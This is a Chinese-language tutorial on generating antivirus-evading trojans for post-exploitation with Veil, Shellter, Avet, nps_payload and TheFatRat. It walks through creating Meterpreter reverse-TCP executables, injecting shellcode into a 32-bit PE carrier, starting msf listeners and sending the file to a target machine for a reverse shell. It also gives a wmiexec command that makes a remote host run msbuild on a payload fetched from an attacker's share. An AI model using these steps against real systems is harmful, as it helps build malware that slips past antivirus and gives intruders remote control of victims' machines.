前言
后渗透过程中往往要使用msf和cs等工具的木马,而默认生成的木马非常容易被杀毒软件检出,这个时候就需要对木马进行免杀,本文介绍几款免杀工具的使用。
虽然经过杀毒软件多年更新,这些工具免杀效果可能已经很一般了,但是相比于自己写编码器解码器来做免杀更为方便简单,没有任何编程积累也可以直接使用。
veil
下载安装
docker安装veil
1
| docker pull mattiasohlsson/veil
|
映射路径并运行
1
| docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
|
介绍
list命令可查看其两个免杀工具,Evasion和Ordnance
- Evasion可用于文件免杀
- Ordnance可生成shellcode
生成msf免杀payload
1
2
| 查看可用的payloads
list payloads
|
1
2
| 选择要使用的payloads,如选择ruby的meterpreter/rev_tcp
use 39
|
1
2
3
| 设置监听ip和端口
set lhost
set
|
1
2
3
4
5
6
7
8
9
| 生成可执行文件并取名test
generate
test
由于刚才配置了映射路径,可执行文件被生成在本机的/tmp/veil-output/compiled路径下,对应的msf的配置文件被生成在/tmp/veil-output/handlers路径下
在本地使用msf配置文件开启msf监听
msfconsole -r test.rc
将test.exe传入目标机器,并运行,反弹回shell
|
使用自定义payload生成免杀木马
使用cs的payload为例
首先在cs的界面,攻击-生成后门-payload generator-veil,保存为payload.txt
开启veil,之前步骤同上
在generate之后的选项中选择3号,自定义payload,然后粘贴payload.txt内容,确认生成
shellter
下载安装
下载windows版
https://www.shellterproject.com/download/
使用shellter注入shellcode
寻找或自行编译一个32位pe程序作为载体
打开shellter
设置注入目标pe程序
选择本地payload或自定义payload
1
2
| L为本地
输入1选择常规的Meterpreter_Reverse_TCP
|
设置lhost和lport
成功生成免杀恶意程序
Avet
下载安装
1
2
3
| git clone https://github.com/govolution/avet
cd avet
./setup.sh
|
使用Avet生成免杀文件
启动
选择要使用的payload编号
设置监听ip端口以及其他配置
生成免杀可执行文件
nps_payload
下载安装
1
2
3
| git clone https://github.com/trustedsec/nps_payload
cd nps_payload/
pip install -r requirements.txt
|
生成
1
2
3
4
5
6
7
8
9
| python nps_payload.py
选择1生成msf类型payload
选择payload类型
设置IP和端口
生成
|
执行
1
2
3
4
5
6
| 1. 本地加载执行:
- %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
2. 远程文件执行:
wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
|
msf监听
1
| msfconsole -r msbuild_nps.rc
|
TheFatRat
下载安装
1
2
3
4
| git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat
chmod +x setup.sh
./setup.sh
|
运行